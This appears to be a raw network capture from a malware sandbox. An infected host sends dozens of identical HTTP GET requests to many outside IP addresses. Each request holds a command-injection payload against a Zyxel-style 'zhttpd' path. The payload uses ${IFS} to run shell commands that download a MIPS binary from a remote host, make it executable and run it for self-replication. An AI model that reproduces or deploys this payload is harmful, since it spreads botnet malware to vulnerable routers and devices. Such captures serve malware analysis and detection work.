                                                Jan 12, 2024 18:24:30.720731020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3155192.168.2.135008052.152.93.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720810890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3156192.168.2.133964412.153.253.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720865011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3157192.168.2.1341044204.222.90.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.720921993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3158192.168.2.1346504171.189.219.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721000910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3159192.168.2.1352938119.90.67.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721080065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3160192.168.2.134787834.208.155.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721153975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3161192.168.2.136032271.252.223.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721199036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3162192.168.2.134992891.66.209.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721268892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3163192.168.2.1347476164.18.150.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721301079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3164192.168.2.1347740211.25.77.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721385956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3165192.168.2.1351674124.15.212.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721455097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3166192.168.2.134677672.160.30.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721529961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3167192.168.2.135889061.83.150.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721611023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3168192.168.2.135668043.7.168.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721664906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3169192.168.2.1360288160.166.103.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721714973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3170192.168.2.133595635.21.103.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721764088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3171192.168.2.133373441.131.124.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721831083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3172192.168.2.134579877.126.87.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721900940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3173192.168.2.1333086159.189.182.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.721973896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3174192.168.2.1340672132.129.163.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722002029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3175192.168.2.1344542139.249.45.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722098112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3176192.168.2.133960459.174.10.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722161055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3177192.168.2.133947241.22.156.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722225904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3178192.168.2.1354234102.255.180.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722307920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3179192.168.2.1352894124.84.67.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722352982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3180192.168.2.1339862125.98.103.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722435951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3181192.168.2.133712265.161.188.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722482920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3182192.168.2.135790092.25.215.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722573042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3183192.168.2.133320041.137.94.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722635984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3184192.168.2.135518072.212.221.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722713947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3185192.168.2.1346122135.158.195.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722796917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3186192.168.2.1358840124.136.101.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722872972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3187192.168.2.1339634220.254.132.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722922087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3188192.168.2.1358486183.77.78.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.722979069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3189192.168.2.13600384.18.19.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723062038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3190192.168.2.134323460.202.177.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723134041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3191192.168.2.135344476.84.220.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723197937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192192.168.2.1358258207.69.224.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723269939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3193192.168.2.1345098105.20.82.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723331928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3194192.168.2.1350190222.92.179.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723377943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3195192.168.2.1358516210.216.33.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723458052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3196192.168.2.1339856111.105.42.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723499060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3197192.168.2.136035083.143.74.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723551989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3198192.168.2.1359082173.213.69.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723618031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3199192.168.2.134544885.146.187.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723659992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3200192.168.2.13591348.93.185.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723747969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3201192.168.2.133522253.167.182.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723803997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3202192.168.2.1338648193.90.255.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723879099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3203192.168.2.135770834.128.40.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.723943949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3204192.168.2.1348960108.87.90.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724020004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3205192.168.2.133358650.190.43.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724106073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3206192.168.2.135586282.37.123.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724148989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3207192.168.2.1360962154.176.111.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724245071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3208192.168.2.1359156144.89.227.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724309921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3209192.168.2.1357030184.225.140.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724411964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3210192.168.2.133838623.181.105.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724493980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3211192.168.2.133628262.26.174.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724564075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3212192.168.2.135236814.80.91.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724658012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3213192.168.2.1353914188.102.39.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724725962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3214192.168.2.13410562.65.184.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724808931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3215192.168.2.135050819.217.201.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724889994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3216192.168.2.133860427.174.177.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.724967957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3217192.168.2.1355242165.251.231.101443
                                                TimestampBytes transferredDirectionData
